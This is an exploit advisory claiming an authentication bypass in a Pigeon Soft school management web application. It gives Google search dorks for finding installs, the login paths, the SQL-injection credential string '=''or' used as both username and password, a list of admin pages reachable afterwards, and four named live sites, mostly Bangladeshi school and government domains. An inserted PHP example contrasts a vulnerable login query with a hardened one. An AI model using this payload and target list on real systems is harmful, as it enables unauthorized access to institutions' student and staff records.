
WordPress Developed By Pigeon Soft Bangladesh Education Management Improper Authentication Vulnerability

Author: KingSkrupellos, Published: 04-11-2018
# Exploit Title : WordPress Developed By Pigeon Soft Bangladesh Education Management Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/11/2018
# Vendor Homepage : pigeon-soft.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:"Developed By Pigeon Soft"
intext:"Powered By Pigeon Soft"
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] - CWE-592 - [ Authentication Bypass Issues ]

#################################################################################################

# Admin Panel Login Path :

/app/login.php
/wp-login.php

# Authentication Bypass Exploit :

Admin Username : '=''or'

Admin Password : '=''or'

/app/index.php
/app/add-student.php
/app/students.php
/app/addworkingday.php
/app/studentin.php
/app/student-out.php
/app/report-attendance.php
/app/editmark.php
/app/public/admission-form.php
/app/admission-list.php
/app/admit.php
/app/print-admit.php
/app/update-result.php
/app/new-semester-plan.php
/app/semester-plan.php
/app/member-req.php
/app/update-list.php
/app/memberlist.php
/app/reports.php
/app/public/register-check.php
/app/create-message.php
/app/send-email.php
/app/public/membership.php
/app/update-settings.php
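How a login check that splices credentials into its SQL text is defeated by a payload such as the one above, and how the check is closed, as an added PHP example that is not Pigeon Soft's code: the advisory does not show the application's query, so the vulnerable pattern, the `users` table and column names, and the `mysqli` connection are assumptions.

```php
<?php
// Added example, not the vendor's code. Table and column names are assumed.

// VULNERABLE (assumed pattern): the submitted values become part of the SQL
// text, so a crafted username or password rewrites the WHERE clause and the
// query can match a row without the real password (CWE-287 via injection).
function login_vulnerable(mysqli $db, string $user, string $pass): ?array
{
    $sql = "SELECT id, username FROM users "
         . "WHERE username='$user' AND password='$pass'";
    $res = $db->query($sql);
    $row = $res ? $res->fetch_assoc() : null;
    return $row ?: null;
}

// HARDENED: a prepared statement keeps the input as data, the stored value is
// a password hash checked with password_verify(), and an unknown user and a
// wrong password return the same result, so the query can no longer be bent.
function login_hardened(mysqli $db, string $user, string $pass): ?array
{
    $stmt = $db->prepare(
        "SELECT id, username, password_hash FROM users WHERE username = ?"
    );
    $stmt->bind_param('s', $user);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // needs mysqlnd (assumed)
    if (!$row || !password_verify($pass, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

// Usage sketch for a login handler (connection details are placeholders):
// $db = new mysqli('localhost', 'app_user', 'app_password', 'school');
// $me = login_hardened($db, $_POST['username'] ?? '', $_POST['password'] ?? '');
// if ($me === null) { http_response_code(401); exit('invalid credentials'); }
// session_regenerate_id(true);
// $_SESSION['uid'] = $me['id'];
```

Every page under /app/ listed above should also re-check `$_SESSION['uid']` on entry, since the bypass only matters because those pages trust whatever the login handler set.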

#################################################################################################

# Example Vulnerable Sites =>

[+] bograpoly.gov.bd/app/index.php

[+] gmmhs.edu.bd/app/login.php

[+] gfisc.edu.bd/app/login.php

[+] itihasacademybd.com/app/login.php

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
